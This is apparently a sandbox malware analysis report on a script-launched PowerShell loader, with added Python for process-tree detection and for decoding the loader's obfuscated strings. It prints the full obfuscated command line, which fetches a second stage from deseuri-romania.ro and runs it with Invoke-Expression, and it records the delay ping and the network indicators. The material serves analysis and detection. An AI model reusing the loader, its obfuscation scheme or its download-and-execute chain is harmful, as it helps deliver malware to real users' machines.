Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 98.3% probability |
Source: unknown |
HTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2 |
Source: |
Binary string: stem.Core.pdbTE source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /Bennington.jpb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: deseuri-romania.ro
Connection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e |
Source: global traffic |
DNS traffic detected: DNS query: deseuri-romania.ro |
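The process-tree lines above record two things worth alerting on: wscript.exe spawning powershell.exe, and wscript.exe spawning PING.EXE against Horm5zl_6637.6637.6637.657e, a name that cannot resolve (the report also records the DNS query for it). Pinging an unresolvable name is a common way to burn time before the next stage; the report itself only shows the process and the lookup. The following is an added example of how those two checks look as detection logic over process-creation events; it is not code from the report or from Joe Sandbox, and the event records in it are constructed (the first two mirror the parent/child pairs logged above, the last two are benign controls).

```python
"""Process-tree checks for the behaviour this report records:
wscript.exe launching powershell.exe, and wscript.exe launching PING.EXE
against a name that cannot be a real host.

Added example for a detection pipeline; the event records below are
constructed, not taken from the sandbox's telemetry.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# RFC 1123 host label: letters, digits, hyphens; no underscore, no leading/trailing hyphen.
DNS_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?$")

# Constructed events. The first two mirror the parent/child pairs in the report
# (the PowerShell command line is an excerpt); the last two are benign controls.
EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe \" <#Hogherd Chimariko Colonizabilities Sternebra #>;"
                "$Outdoorsy='Familienavnets';$Programmeringssprogets=$Wane+$host.UI; ...\""},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping Horm5zl_6637.6637.6637.657e"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping -n 2 1.1.1.1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-Process"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ping_target(cmdline: str):
    """Last non-switch argument of a ping command line (ping takes -n, -w, /n ...)."""
    args = [t for t in cmdline.split()[1:] if not t.startswith(("-", "/"))]
    return args[-1] if args else None


def bogus_hostname(target) -> bool:
    """True when the target is neither an IPv4 literal nor a plausible DNS name.

    An underscore or an empty label never appears in a resolvable public name,
    and a top-level label containing digits only occurs in punycode (xn--) TLDs.
    """
    if not target or IPV4.match(target):
        return False
    labels = target.split(".")
    if any(not DNS_LABEL.match(lbl) for lbl in labels):
        return True
    tld = labels[-1].lower()
    return len(labels) > 1 and not tld.isalpha() and not tld.startswith("xn--")


def detect(events):
    """Return (rule, detail) hits for the two behaviours seen in the report."""
    hits = []
    for ev in events:
        parent, child = basename(ev["parent"]), basename(ev["image"])
        if parent not in SCRIPT_HOSTS:
            continue
        if child == "powershell.exe":
            hits.append(("script_host_spawns_powershell", ev["cmdline"][:60]))
        elif child == "ping.exe":
            target = ping_target(ev["cmdline"])
            if bogus_hostname(target):
                hits.append(("script_host_ping_bogus_host", target))
    return hits


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule}: {detail}")
```

Run against the constructed events, the two wscript.exe children fire and the two explorer.exe children do not; the hostname check is deliberately narrow (syntax that cannot be a public name) so that a legitimate `ping deseuri-romania.ro` from a script host would only trip the parent/child rule, not this one.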
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2D92000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://deseuri-romania.ro |
Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB_q |
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://deseuri-romania.ro |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://deseuri-romania.ro/Bennington.jpbP |
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://deseuri-romania.ro/Bennington.jpbXR0l |
Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.1484608451.000002D2D21BE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
HTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2 |
Source: amsi64_7608.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_7852.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: 
por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaCons |
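Every obfuscated literal in the command line above goes through one decoder, the function named Tollhouse in this sample: the quoted strings are padding with the real characters at every fifth position, and the function walks the string from index 4 in steps of 5, stopping one short of the end (`$host.UI` is always non-null, so the `$abasements++` branch runs and the loop bound is `Length - 1`). The following is an added Python re-implementation for offline triage; it is not code from the report or from the sample. The literals are copied from the command line above. A few of the longer ones in the report rendering have evidently had runs of spaces collapsed and no longer decode cleanly (the User-Agent body and the `[Net.ServicePointManager]` fragment), so only literals that still decode are included.

```python
"""Decoder for the every-fifth-character string obfuscation used by the
wscript.exe -> powershell.exe command line in this report.

In the sample, `Tollhouse($Lao)` does, in effect:
    for ($i = 4; $i -lt ($Lao.Length - 1); $i += 5) { $out += $Lao[$i] }
The subtracted 1 comes from `$abasements++`, which always runs because
`$host.UI` is non-null. This file is an added example, not code from the report.
"""


def tollhouse(blob: str) -> str:
    """Return the characters at indices 4, 9, 14, ... of `blob`, stopping before len-1."""
    return "".join(blob[i] for i in range(4, len(blob) - 1, 5))


# Literals copied from the report's PowerShell command line, keyed by the
# variable each one is assigned to in the sample. Only literals whose spacing
# survived the report rendering are listed.
REPORT_LITERALS = {
    "Skubbe": "ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ",
    "Dendrochronologically": "BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ",
    "Galvanism": ("Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteu"
                  "AlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf"
                  "/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst "),
    "Play": " org>Dec, ",
    "forstbotanikker": " UnliGenoE locx Gud ",
}


def decode_report_strings(literals=REPORT_LITERALS) -> dict:
    """Decode every literal; returns {variable_name: cleartext}."""
    return {name: tollhouse(blob) for name, blob in literals.items()}


def extract_urls(decoded: dict) -> list:
    """Anything that decodes to a URL is the stage-2 download target: an IOC."""
    return [v for v in decoded.values() if v.lower().startswith(("http://", "https://"))]


if __name__ == "__main__":
    decoded = decode_report_strings()
    for name, clear in decoded.items():
        print(f"${name:<22} -> {clear!r}")
    print("URLs:", extract_urls(decoded))
```

Decoding the listed literals gives `Mozilla/` (start of the User-Agent the HTTP request above carries), `uSeR-AGEnt`, the download URL `https://deseuri-romania.ro/Bennington.jpb` that matches the GET request and DNS query in the report, `>` and `iEx`; the last one is the Invoke-Expression alias that the Profitmagere function dot-sources with each decoded chunk (`. ($forstbotanikker) ($Shoetrees)`), which is how the next stage gets executed.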